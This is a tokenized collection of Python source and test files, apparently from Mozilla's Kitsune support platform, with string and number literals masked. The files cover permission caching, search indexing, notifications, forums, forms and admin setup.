. user , <EOL> True , <EOL> False , <EOL> ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> ContentType . objects . clear_cache ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> True , <EOL> False , <EOL> ) <EOL> def test_invalidate_group_permissions_cache ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:4> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> self . group_check . invalidate_permissions_cache ( ) <EOL> ContentType . objects . clear_cache ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> def test_has_user_perms_check_group_multiple ( self ) : <EOL> Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> with self . assertNumQueries ( <NUM_LIT:2> ) : <EOL> assert self . user_check . has_user_perms ( '<STR_LIT:foo>' , self . user , True , True ) <EOL> new_group = Group . objects . create ( name = '<STR_LIT>' ) <EOL> new_group . user_set . add ( self . user ) <EOL> Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = new_group , <EOL> approved = True , <EOL> ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> with self . assertNumQueries ( <NUM_LIT:2> ) : <EOL> assert self . user_check . has_user_perms ( '<STR_LIT:foo>' , self . user , True , True ) <EOL> class GroupPermissionCacheTestCase ( SmartCachingTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_has_user_perms_with_groups ( self ) : <EOL> perms = self . _old_user_permission_check ( ) <EOL> self . assertEqual ( [ ] , list ( perms ) ) <EOL> can_foo_with_group = self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> self . assertFalse ( can_foo_with_group ) <EOL> perm = Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> perms = self . _old_user_permission_check ( ) <EOL> self . assertEqual ( [ perm ] , list ( perms ) ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> can_foo_with_group = self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> self . assertTrue ( can_foo_with_group ) <EOL> def test_has_group_perms_no_user ( self ) : <EOL> can_foo_with_group = self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> ) <EOL> self . assertFalse ( can_foo_with_group ) <EOL> perms = self . _old_group_permission_check ( ) <EOL> self . assertEqual ( [ ] , list ( perms ) ) <EOL> perm = Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( Group ) , <EOL> object_id = self . group . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> perms = self . _old_group_permission_check ( ) <EOL> self . assertEqual ( [ perm ] , list ( perms ) ) <EOL> self . group_check . invalidate_permissions_cache ( ) <EOL> can_foo_with_group = self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> approved = True , <EOL> ) <EOL> self . assertTrue ( can_foo_with_group ) </s>
<s> from nose . tools import eq_ <EOL> from pyquery import PyQuery as pq <EOL> from kitsune . sumo . templatetags . jinja_helpers import urlparams <EOL> from kitsune . sumo . tests import LocalizingClient <EOL> from kitsune . sumo . urlresolvers import reverse <EOL> from kitsune . search . tests import ElasticTestCase <EOL> class TopContributorsNewTests ( ElasticTestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = LocalizingClient <EOL> def test_it_works ( self ) : <EOL> url = reverse ( '<STR_LIT>' , args = [ '<STR_LIT>' ] ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) <EOL> def test_no_xss ( self ) : <EOL> bad_string = '<STR_LIT>' <EOL> good_string = '<STR_LIT>' <EOL> url = reverse ( '<STR_LIT>' , args = [ '<STR_LIT>' ] ) <EOL> url = urlparams ( url , locale = bad_string ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) <EOL> doc = pq ( res . content ) <EOL> target = doc ( '<STR_LIT>' ) <EOL> assert bad_string not in target . html ( ) <EOL> assert good_string in target . html ( ) <EOL> class ContributorsMetricsTests ( ElasticTestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = LocalizingClient <EOL> def test_it_works ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) </s>
<s> import django_filters <EOL> from rest_framework import generics <EOL> from rest_framework . relations import SlugRelatedField <EOL> from rest_framework . serializers import ModelSerializer <EOL> from kitsune . dashboards . models import WikiMetric <EOL> from kitsune . products . models import Product <EOL> class WikiMetricSerializer ( ModelSerializer ) : <EOL> product = SlugRelatedField ( <EOL> slug_field = '<STR_LIT>' , <EOL> queryset = Product . objects . all ( ) ) <EOL> class Meta : <EOL> model = WikiMetric <EOL> fields = ( '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , '<STR_LIT:value>' ) <EOL> class ProductFilter ( django_filters . Filter ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , qs , value ) : <EOL> if value is None : <EOL> return qs <EOL> if value == '<STR_LIT>' or value == '<STR_LIT:null>' : <EOL> return qs . filter ( product = None ) <EOL> return qs . filter ( product__slug = value ) <EOL> class WikiMetricFilterSet ( django_filters . FilterSet ) : <EOL> """<STR_LIT>""" <EOL> product = ProductFilter ( ) <EOL> class Meta : <EOL> model = WikiMetric <EOL> fields = [ '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class WikiMetricList ( generics . ListAPIView ) : <EOL> """<STR_LIT>""" <EOL> queryset = WikiMetric . objects . all ( ) <EOL> serializer_class = WikiMetricSerializer <EOL> filter_class = WikiMetricFilterSet </s>
<s> THREADS_PER_PAGE = <NUM_LIT:20> <EOL> POSTS_PER_PAGE = <NUM_LIT:20> </s>
<s> import factory <EOL> from kitsune . gallery . models import Image , Video <EOL> from kitsune . sumo . tests import FuzzyUnicode <EOL> from kitsune . users . tests import UserFactory <EOL> class ImageFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Image <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> description = FuzzyUnicode ( ) <EOL> file = factory . django . ImageField ( ) <EOL> title = FuzzyUnicode ( ) <EOL> class VideoFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Video <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> webm = factory . django . FileField ( from_path = '<STR_LIT>' ) <EOL> ogv = factory . django . FileField ( from_path = '<STR_LIT>' ) <EOL> flv = factory . django . FileField ( from_path = '<STR_LIT>' ) </s>
<s> from django . contrib import admin <EOL> from kitsune . journal . models import Record <EOL> class RecordAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:src>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> list_filter = ( '<STR_LIT:src>' , ) <EOL> admin . site . register ( Record , RecordAdmin ) </s>
<s> import time <EOL> from nose . tools import eq_ <EOL> from pyquery import PyQuery as pq <EOL> from kitsune . kbforums . feeds import ThreadsFeed , PostsFeed <EOL> from kitsune . kbforums . tests import KBForumTestCase , get , ThreadFactory <EOL> from kitsune . wiki . tests import DocumentFactory <EOL> class FeedSortingTestCase ( KBForumTestCase ) : <EOL> def test_threads_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> d = DocumentFactory ( ) <EOL> t = ThreadFactory ( document = d ) <EOL> t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> t2 = ThreadFactory ( document = d ) <EOL> t2 . new_post ( creator = t2 . creator , content = '<STR_LIT:foo>' ) <EOL> given_ = ThreadsFeed ( ) . items ( d ) [ <NUM_LIT:0> ] . id <EOL> eq_ ( t2 . id , given_ ) <EOL> def test_posts_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> t = ThreadFactory ( ) <EOL> t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> p2 = t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> given_ = PostsFeed ( ) . items ( t ) [ <NUM_LIT:0> ] . id <EOL> eq_ ( p2 . id , given_ ) <EOL> def test_multi_feed_titling ( self ) : <EOL> """<STR_LIT>""" <EOL> d = DocumentFactory ( ) <EOL> response = get ( self . client , '<STR_LIT>' , args = [ d . slug ] ) <EOL> doc = pq ( response . content ) <EOL> given_ = doc ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . attrib [ '<STR_LIT:title>' ] <EOL> exp_ = ThreadsFeed ( ) . title ( d ) <EOL> eq_ ( exp_ , given_ ) </s>
<s> from collections import namedtuple <EOL> import json <EOL> import os <EOL> Language = namedtuple ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> file = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> locales = json . loads ( open ( file , '<STR_LIT:r>' ) . read ( ) ) <EOL> LOCALES = { } <EOL> for k in locales : <EOL> LOCALES [ k ] = Language ( locales [ k ] [ '<STR_LIT>' ] , locales [ k ] [ '<STR_LIT>' ] , <EOL> locales [ k ] [ '<STR_LIT>' ] ) </s>
<s> import logging <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . db . models import Q <EOL> import actstream . registry <EOL> import simplejson <EOL> import requests <EOL> from actstream . models import Action , Follow <EOL> from celery import task <EOL> from multidb . pinning import use_master <EOL> from requests . exceptions import RequestException <EOL> from kitsune . notifications . models import ( <EOL> Notification , RealtimeRegistration , PushNotificationRegistration ) <EOL> from kitsune . notifications . decorators import notification_handler , notification_handlers <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def _ct_query ( object , actor_only = None , ** kwargs ) : <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> if actor_only is not None : <EOL> kwargs [ '<STR_LIT>' ] = actor_only <EOL> return Q ( content_type = ct . pk , object_id = object . pk , ** kwargs ) <EOL> def _full_ct_query ( action , actor_only = None ) : <EOL> """<STR_LIT>""" <EOL> actstream . registry . check ( action . actor ) <EOL> query = _ct_query ( action . actor ) <EOL> if action . target is not None : <EOL> actstream . registry . check ( action . target ) <EOL> query |= _ct_query ( action . target , actor_only ) <EOL> if action . action_object is not None : <EOL> actstream . registry . check ( action . action_object ) <EOL> query |= _ct_query ( action . action_object , actor_only ) <EOL> return query <EOL> def _send_simple_push ( endpoint , version , max_retries = <NUM_LIT:3> , _retry_count = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> r = requests . put ( endpoint , '<STR_LIT>' . format ( version ) ) <EOL> except RequestException as e : <EOL> if _retry_count < max_retries : <EOL> return _send_simple_push ( endpoint , version , max_retries , _retry_count + <NUM_LIT:1> ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , e ) <EOL> return <EOL> if r . status_code >= <NUM_LIT> : <EOL> try : <EOL> data = r . json ( ) <EOL> except simplejson . scanner . JSONDecodeError : <EOL> logger . error ( '<STR_LIT>' , r . status_code , r . text ) <EOL> return <EOL> if r . status_code == <NUM_LIT> and data [ '<STR_LIT>' ] == <NUM_LIT> and _retry_count < max_retries : <EOL> return _send_simple_push ( endpoint , version , max_retries , _retry_count + <NUM_LIT:1> ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , r . status_code , r . json ( ) ) <EOL> @ task ( ignore_result = True ) <EOL> @ use_master <EOL> def add_notification_for_action ( action_id ) : <EOL> action = Action . objects . get ( id = action_id ) <EOL> query = _full_ct_query ( action , actor_only = False ) <EOL> query &= ~ Q ( user = action . actor ) <EOL> users_to_notify = set ( f . user for f in Follow . objects . filter ( query ) ) <EOL> for u in users_to_notify : <EOL> Notification . objects . create ( owner = u , action = action ) <EOL> @ task ( ignore_result = True ) <EOL> @ use_master <EOL> def send_realtimes_for_action ( action_id ) : <EOL> action = Action . objects . get ( id = action_id ) <EOL> query = _full_ct_query ( action ) <EOL> query &= ~ Q ( creator = action . actor ) <EOL> registrations = RealtimeRegistration . objects . filter ( query ) <EOL> for reg in registrations : <EOL> _send_simple_push ( reg . endpoint , action . id ) <EOL> @ task ( ignore_result = True ) <EOL> def send_notification ( notification_id ) : <EOL> """<STR_LIT>""" <EOL> notification = Notification . objects . get ( id = notification_id ) <EOL> for handler in notification_handlers : <EOL> handler ( notification ) <EOL> @ notification_handler <EOL> def simple_push ( notification ) : <EOL> """<STR_LIT>""" <EOL> registrations = PushNotificationRegistration . objects . filter ( creator = notification . owner ) <EOL> for reg in registrations : <EOL> _send_simple_push ( reg . push_url , notification . id ) </s>
<s> from django . contrib import admin <EOL> from kitsune . questions . models import QuestionLocale <EOL> class QuestionLocaleAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> filter_horizontal = ( '<STR_LIT>' , ) <EOL> admin . site . register ( QuestionLocale , QuestionLocaleAdmin ) </s>
<s> from nose . tools import eq_ <EOL> from kitsune . questions import config <EOL> from kitsune . questions . models import Question , Answer <EOL> from kitsune . questions . tests import AnswerFactory , QuestionFactory <EOL> from kitsune . sumo . tests import TestCase <EOL> from kitsune . tags . tests import TagFactory <EOL> class QuestionManagerTestCase ( TestCase ) : <EOL> def test_done ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . done ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . done ( ) . count ( ) ) <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . done ( ) . count ( ) ) <EOL> QuestionFactory ( is_locked = True ) <EOL> eq_ ( <NUM_LIT:2> , Question . objects . done ( ) . count ( ) ) <EOL> def test_responded ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( creator = q . creator , question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . responded ( ) . count ( ) ) <EOL> q . is_locked = True <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> q . is_locked = False <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> def test_needs_attention ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> a = AnswerFactory ( creator = q . creator , question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> q . is_locked = True <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> q . is_locked = False <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> def test_needs_info ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_info ( ) . count ( ) ) <EOL> q . set_needs_info ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_info ( ) . count ( ) ) <EOL> q . unset_needs_info ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_info ( ) . count ( ) ) <EOL> def test_escalated ( self ) : <EOL> """<STR_LIT>""" <EOL> t = TagFactory ( name = config . ESCALATE_TAG_NAME , slug = config . ESCALATE_TAG_NAME ) <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . escalated ( ) . count ( ) ) <EOL> q . tags . add ( t ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . escalated ( ) . count ( ) ) <EOL> class AnswerManagerTestCase ( TestCase ) : <EOL> def test_not_by_asker ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> AnswerFactory ( question = q , creator = q . creator ) <EOL> eq_ ( <NUM_LIT:0> , Answer . objects . not_by_asker ( ) . count ( ) ) <EOL> AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Answer . objects . not_by_asker ( ) . count ( ) ) </s>
<s> import datetime <EOL> import logging <EOL> from threading import local <EOL> from django . conf import settings <EOL> from django . core import signals <EOL> from django . db import models <EOL> from django . db . models . signals import pre_delete , post_save , m2m_changed <EOL> from django . dispatch import receiver <EOL> from elasticutils . contrib . django import MappingType , Indexable , MLT <EOL> from elasticsearch . exceptions import NotFoundError <EOL> from kitsune . search import es_utils <EOL> from kitsune . search . tasks import index_task , unindex_task <EOL> from kitsune . sumo . models import ModelBase <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> _search_mapping_types = { } <EOL> def get_mapping_types ( mapping_types = None ) : <EOL> """<STR_LIT>""" <EOL> if mapping_types is None : <EOL> values = _search_mapping_types . values ( ) <EOL> else : <EOL> values = [ _search_mapping_types [ name ] for name in mapping_types ] <EOL> values . sort ( key = lambda cls : cls . get_mapping_type_name ( ) ) <EOL> return values <EOL> _local = local ( ) <EOL> def _local_tasks ( ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( _local , '<STR_LIT>' , None ) is None : <EOL> _local . tasks = set ( ) <EOL> return _local . tasks <EOL> class SearchMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_mapping_type ( cls ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def index_later ( self ) : <EOL> """<STR_LIT>""" <EOL> _local_tasks ( ) . add ( ( index_task . delay , <EOL> ( self . get_mapping_type ( ) , ( self . pk , ) ) ) ) <EOL> def unindex_later ( self ) : <EOL> """<STR_LIT>""" <EOL> _local_tasks ( ) . add ( ( unindex_task . delay , <EOL> ( self . get_mapping_type ( ) , ( self . pk , ) ) ) ) <EOL> class SearchMappingType ( MappingType , Indexable ) : <EOL> """<STR_LIT>""" <EOL> list_keys = [ ] <EOL> @ classmethod <EOL> def search ( cls ) : <EOL> return es_utils . Sphilastic ( cls ) <EOL> @ classmethod <EOL> def get_index ( cls ) : <EOL> return es_utils . write_index ( cls . get_index_group ( ) ) <EOL> @ classmethod <EOL> def get_index_group ( cls ) : <EOL> return '<STR_LIT:default>' <EOL> @ classmethod <EOL> def get_query_fields ( cls ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def get_localized_fields ( cls ) : <EOL> return [ ] <EOL> @ classmethod <EOL> def get_indexable ( cls ) : <EOL> return cls . get_model ( ) . objects . order_by ( '<STR_LIT>' ) . values_list ( <EOL> '<STR_LIT>' , flat = True ) <EOL> @ classmethod <EOL> def reshape ( cls , results ) : <EOL> """<STR_LIT>""" <EOL> list_keys = cls . list_keys <EOL> return [ <EOL> dict ( ( key , ( val if key in list_keys else val [ <NUM_LIT:0> ] ) ) <EOL> for key , val in result . items ( ) ) <EOL> for result in results <EOL> ] <EOL> @ classmethod <EOL> def index ( cls , * args , ** kwargs ) : <EOL> if not settings . ES_LIVE_INDEXING : <EOL> return <EOL> super ( SearchMappingType , cls ) . index ( * args , ** kwargs ) <EOL> @ classmethod <EOL> def unindex ( cls , * args , ** kwargs ) : <EOL> if not settings . ES_LIVE_INDEXING : <EOL> return <EOL> try : <EOL> super ( SearchMappingType , cls ) . unindex ( * args , ** kwargs ) <EOL> except NotFoundError : <EOL> pass <EOL> @ classmethod <EOL> def morelikethis ( cls , id_ , s , fields ) : <EOL> """<STR_LIT>""" <EOL> return list ( MLT ( id_ , s , fields , min_term_freq = <NUM_LIT:1> , min_doc_freq = <NUM_LIT:1> ) ) <EOL> def _identity ( s ) : <EOL> return s <EOL> def register_for_indexing ( app , <EOL> sender_class , <EOL> instance_to_indexee = _identity , <EOL> m2m = False ) : <EOL> """<STR_LIT>""" <EOL> def maybe_call_method ( instance , is_raw , method_name ) : <EOL> """<STR_LIT>""" <EOL> obj = instance_to_indexee ( instance ) <EOL> if obj is not None and not is_raw : <EOL> getattr ( obj , method_name ) ( ) <EOL> def update ( sender , instance , ** kw ) : <EOL> """<STR_LIT>""" <EOL> maybe_call_method ( instance , kw . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def delete ( sender , instance , ** kw ) : <EOL> """<STR_LIT>""" <EOL> maybe_call_method ( instance , kw . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def indexing_receiver ( signal , signal_name ) : <EOL> """<STR_LIT>""" <EOL> return receiver ( <EOL> signal , <EOL> sender = sender_class , <EOL> dispatch_uid = '<STR_LIT>' % <EOL> ( app , sender_class . __name__ , signal_name ) , <EOL> weak = False ) <EOL> if m2m : <EOL> indexing_receiver ( m2m_changed , '<STR_LIT>' ) ( update ) <EOL> else : <EOL> indexing_receiver ( post_save , '<STR_LIT>' ) ( update ) <EOL> indexing_receiver ( pre_delete , '<STR_LIT>' ) ( <EOL> delete if instance_to_indexee is _identity else update ) <EOL> def register_mapping_type ( cls ) : <EOL> """<STR_LIT>""" <EOL> _search_mapping_types [ cls . get_mapping_type_name ( ) ] = cls <EOL> return cls <EOL> def generate_tasks ( ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tasks = _local_tasks ( ) <EOL> for fun , args in tasks : <EOL> fun ( * args ) <EOL> tasks . clear ( ) <EOL> signals . request_finished . connect ( generate_tasks ) <EOL> class RecordManager ( models . Manager ) : <EOL> def outstanding ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . filter ( status__in = Record . STATUS_OUTSTANDING ) <EOL> class Record ( ModelBase ) : <EOL> """<STR_LIT>""" <EOL> STATUS_NEW = <NUM_LIT:0> <EOL> STATUS_IN_PROGRESS = <NUM_LIT:1> <EOL> STATUS_FAIL = <NUM_LIT:2> <EOL> STATUS_SUCCESS = <NUM_LIT:3> <EOL> STATUS_CHOICES = ( <EOL> ( STATUS_NEW , '<STR_LIT>' ) , <EOL> ( STATUS_IN_PROGRESS , '<STR_LIT>' ) , <EOL> ( STATUS_FAIL , '<STR_LIT>' ) , <EOL> ( STATUS_SUCCESS , '<STR_LIT>' ) , <EOL> ) <EOL> STATUS_OUTSTANDING = [ STATUS_NEW , STATUS_IN_PROGRESS ] <EOL> batch_id = models . CharField ( max_length = <NUM_LIT:10> ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> creation_time = models . DateTimeField ( auto_now_add = True ) <EOL> start_time = models . DateTimeField ( null = True ) <EOL> end_time = models . DateTimeField ( null = True ) <EOL> status = models . IntegerField ( choices = STATUS_CHOICES , default = STATUS_NEW ) <EOL> message = models . CharField ( max_length = <NUM_LIT:255> , blank = True ) <EOL> objects = RecordManager ( ) <EOL> class Meta : <EOL> ordering = [ '<STR_LIT>' ] <EOL> permissions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> def delta ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . start_time and self . end_time : <EOL> return self . end_time - self . start_time <EOL> return None <EOL> def _complete ( self , status , msg = '<STR_LIT>' ) : <EOL> self . end_time = datetime . datetime . now ( ) <EOL> self . status = status <EOL> self . message = msg <EOL> def mark_fail ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> self . _complete ( self . STATUS_FAIL , msg [ : <NUM_LIT:255> ] ) <EOL> self . save ( ) <EOL> def mark_success ( self , msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . _complete ( self . STATUS_SUCCESS , msg [ : <NUM_LIT:255> ] ) <EOL> self . save ( ) <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT>' % ( self . batch_id , self . name , self . status ) <EOL> class Synonym ( ModelBase ) : <EOL> """<STR_LIT>""" <EOL> from_words = models . CharField ( max_length = <NUM_LIT> ) <EOL> to_words = models . CharField ( max_length = <NUM_LIT> ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' . format ( self . from_words , self . to_words ) </s>
<s> from django . conf import settings <EOL> from django . utils import translation <EOL> from kitsune . questions . models import QuestionLocale <EOL> def global_settings ( request ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : settings } <EOL> def i18n ( request ) : <EOL> return { '<STR_LIT>' : ( settings . LANGUAGE_URL_MAP . get ( translation . get_language ( ) ) or <EOL> translation . get_language ( ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' if translation . get_language_bidi ( ) else '<STR_LIT>' } <EOL> def aaq_languages ( request ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : QuestionLocale . objects . locales_list ( ) } </s>
<s> from django import forms <EOL> from nose . tools import eq_ <EOL> from pyquery import PyQuery as pq <EOL> from kitsune . sumo . form_fields import StrippedCharField <EOL> from kitsune . sumo . tests import TestCase <EOL> class ExampleForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> char = forms . CharField ( max_length = <NUM_LIT:10> ) <EOL> char_optional = forms . CharField ( required = False , <EOL> widget = forms . TextInput ( ) ) <EOL> file = forms . FileField ( max_length = <NUM_LIT:10> ) <EOL> choice = forms . ChoiceField ( choices = ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ) ) <EOL> stripped_char = StrippedCharField ( max_length = <NUM_LIT:10> ) <EOL> bool = forms . BooleanField ( ) <EOL> textarea = StrippedCharField ( widget = forms . Textarea ( ) ) <EOL> email = forms . EmailField ( ) <EOL> url = forms . URLField ( required = False ) <EOL> date = forms . DateField ( ) <EOL> time = forms . TimeField ( ) <EOL> class TestFields ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . f = ExampleForm ( ) <EOL> def _attr_eq ( self , field , attr , value ) : <EOL> doc = pq ( str ( self . f [ field ] ) ) <EOL> eq_ ( value , doc . attr ( attr ) ) <EOL> def test_char_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_char_optional_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> def test_file_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_choice_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_stripped_char_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_bool_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:bool>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_textarea_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _attr_eq ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_email_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:email>' , '<STR_LIT:type>' , '<STR_LIT:email>' ) <EOL> self . _attr_eq ( '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_url_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:url>' , '<STR_LIT:type>' , '<STR_LIT:url>' ) <EOL> self . _attr_eq ( '<STR_LIT:url>' , '<STR_LIT>' , None ) <EOL> def test_date_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:date>' , '<STR_LIT:type>' , '<STR_LIT:date>' ) <EOL> self . _attr_eq ( '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_time_field ( self ) : <EOL> self . _attr_eq ( '<STR_LIT:time>' , '<STR_LIT:type>' , '<STR_LIT:time>' ) <EOL> self . _attr_eq ( '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ) </s>
